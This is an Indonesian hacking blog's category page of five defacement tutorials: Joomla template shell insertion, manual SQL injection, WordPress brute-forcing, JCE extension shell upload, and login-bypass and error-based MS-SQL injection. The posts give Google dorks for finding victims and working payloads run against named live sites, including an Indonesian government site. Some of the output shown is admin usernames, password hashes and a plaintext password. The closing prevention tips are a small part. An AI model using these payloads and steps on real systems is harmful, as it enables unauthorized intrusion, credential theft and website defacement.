MRU Not Valid HTML5

Tampilkan postingan dengan label DEFACE. Tampilkan semua postingan

+

Cara Tebas Index Website CMS Joomla

Rabu, 09 Oktober 2013
Posted by Unknown
0 Comments

Assalamualaikum ..

 Ketemu lagi dengan tutorial semrawut dari ane ^o^, yoo kali ini ane mau share nih cara tebas INDEX dari CMS Joomla :D

Mengingat di Group masih banyak teman teman yang bertanya cara Tebas Index Joomla :D

 Yuk, basa basinya udahan  kowkowkwk .

 Oke simak dulu yah, nanti kalo belum faham baru tanya di Groups, atau di komentar ^_^

 Saya anggap kalian udah ada live targetnya yah, kalo belum bisa dibaca disini
Oke langsung saja kita mulai.

 1.  Kalian Klik Icon "TEMPLATE MANAGER" (see image)

2. Lalu klik "template" (see image)


3.  Lalu pilih template yang aktif di website tersebut.


4. Lalu klik "Edit Main Page Template" (see image)


5. Lalu pastekan "Shell/Script" kalian di kolom yang tersedia :D
#WARNING : Back Up dulu script asli website tersebut ^o^


6. Jeng jenggggggg !!!! sekarang cek deh hasilnya di Index websitenya ^_^



NB : Jika gagal, maka ulangin lagi dari step ke-3 :)

Sekian tutorial singkat dari saya :D. jika kurang jelas bisa kalian tanyakan kok :p

Content Creator By : Bimo Septiawan

 tag : deface joomla , deface index . cara mudah deface index , exploit joomla
+

Cara Hacking Website Dengan Teknik Manual SQL Injection

Sabtu, 05 Oktober 2013
Posted by Unknown
0 Comments



Pengertian SQL Injection 

SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : 

id=$id;……. > Got Error

Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.

Contoh : 
http://situstarget.com/news.php?id=1’ 
http://situstarget.com/news.php?id=’1

 Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.

 Dork SQLi :
inurl:azerty.php?id= ,
inurl:bouquin.php?id= ,
inurl:lien.php?id= ,
inurl:clavier.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1

Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

 http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error

 
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error

Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.


Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.


 Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--


Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.

Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--


Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--


Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--



Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja, jebreet jebreet jebreet :D


Saya kira hanya begitu saja, kurang lebih mohon maaf.. kalo ada kesalahan mohon diperbaiki :) wassalam :*

Content Creator : Onix AQua


+

Cara Mudah Deface Wordpress Site Dengan WP Bruteforce

Posted by Unknown
1 Comment

UPDATE: Link sudah diperbaiki... :)

Salam Sobat,, ;)


Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: http://indocyberarmy.blogspot.com

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute


Lalu buka comand dengan cara : Klik Start>Run>ketik cmd


Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 



Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!


Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10



Lalu tekan enter!

Tunggu proses hingga selesai!



Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!




GoodLuck!! :D

Content Created By : Onix AQua


Tag : Cara Deface Wordpress, Brute Attack Wordpress, Deface Website Mudah

+

Cara Deface Web Dengan Exploit JCE Joomla Extension

Jumat, 04 Oktober 2013
Posted by Unknown
0 Comments






                 Setelah lama saya tidak posting deface, kali ini 
saya akan share trik deface yang akhir - akhir ini menjadi trik yang sering digunakan para defacer, simak seperti apa trik ini.




Ada 2 cara yang dapat kita gunakan, yaitu dengan JCE Exploiter yang versi .exe & yang versi .php

JCE Exploiter Versi .exe

1. Download JCE Exploiternya disini

2. Selesai download, anda cari target yang vuln menggunakan dork :
inurl:index.php?option=com_jce

3. Silahkan anda test satu persatu web dari hasil dork apakah web tersebut vuln atau tidak dengan mencopy url webnya, yaitu : www.site.com

4. Buka JCE Exploiter yang tadi diunduh, lalu klik 2x pada JCE.exe




5. Jika vuln, maka akan keluar url/link shell anda di kolom bawah seperti ini




6. Anda copy link tersebut ke addressbar, maka akan muncul uploader untuk upload shell anda




7. Untuk membuka shellnya, tinggal rename url di bagian paling belakang, yaitu 3xp.php menjadi namashellanda.php

8. Maka muncul deh shell anda, eksekusi deh tuh web.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja

JCE Exploiter Versi .php

1. Download scriptnya disini

2. Selesai download, jangan dilupa diekstrak terlebih dahulu

3. Lalu anda upload file php tersebut pada web hosting anda/web hasil deface sebelumnya, atau anda bisa gunakan punya saya disini



4. Kemudian anda cari target yang vuln menggunakan dork :
inurl:index.php?option=com_jce

5. Nah anda isi deh kolom kolom kosong di JCE.php tadi
- Anda masukkan url target ke kolom "hostname", misal : www.site.com (tidak menggunakan http://)
- Anda masukkan path target ke kolom "path", misal : webnya www.site.com/v2/, maka pathnya /v2/ tapi jika tidak ada pathnya isi saja /
- "Please specify a file to upload" adalah untuk memilih shell anda yang akan diupload
- Kolom selanjutnya kosongi saja

6. Selanjutnya klik "start" dan proses exploitasi akan berjalan, jika berhasil maka dibawah akan muncul tulisan seperti ini




7. Nah anda copy link tersebut ke addressbar, maka shell kesayangan anda akan muncul. Silahkan deh dieksekusi.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja



+

Deface Website Dengan sql Injection

Posted by Unknown
0 Comments

SQL Injection adalah memasukkan kode-kode SQL untuk mendapatkan akses ke database yang lebih besar daripada yang seharusnya kita dapatkan, terutama pada script yang tidak memvalidasi input dari user.

SQL Injection sebenarnya sudah sering dibahas dimana-mana, tetapi ternyata masih banyak webmaster yang belum tahu atau tidak peduli akan kelemahan ini.



Apa saja yang diperlukan untuk melakukan SQL Injection ?
1. Internet Explorer
2. PC yang terhubung ke Internet

OK, langsung saja kita praktekkan, check this out :

Pertama bukalah [link ini] atau (mbah google) untuk mencari script yang terhubung ke database. Masukkan salah satu keyword di bawah ini (lengkap dengan tanda petiknya) :
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
"root/login.asp"
"admin/index.asp"

Anda bisa menambahkan daftarnya berdasarkan kreatifitas Anda sendiri. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name dan password).

Masukkan kode-kode berikut,
User name : ` or `a'='a
Password : ` or `a'='a
(termasuk tanda petiknya)

Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.

Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google. Menurut pengalaman saya, dari sekitar 20 link yang saya coba, ada dua atau tiga yang berhasil di ahir 2011.

Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a

Di bawah ini bisa dimasukkan baik ke user name maupun password :
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Anda masih bisa memperpanjang daftarnya sesuai kreatifitas Anda.

Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

=======================================================
Hingga Des 2011, masih saja terdapat situs web di Republik Indonesia yang dibobol dengan teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini yang diambil dari langsung tulisan Mr.X
Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.

silahkan ambil contoh sebagai percobaan di situs google (usahakan milik situs yang gak terkenal dl buat percobaan)

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya, beserta nama tabel yang mungkin berbeda-beda. Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN), ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan klausa sum sebelum menentukan apakah jumlah kolom-kolom di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah) yang berlaku untuk type kolom numerik, jadi untuk type kolom yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a char data type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN-- dengan kolom yang berikutnya. Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password, untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'-- artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'bill ' to a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan, atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u


Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.


Kita

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri isinya. Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack oleh Shizoprenic, juga ada di tabel-tabel suatu database, jadi tetep bisa dimasuki dengan cara SQL Injection ini.


************************************************** ****
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
************************************************** ****
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa di inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.

- Copyright © 2012 MR Uzumaki -Nindaime Blue Style- Powered by Djogzs - Designed by Andy -And Muamar Rizky -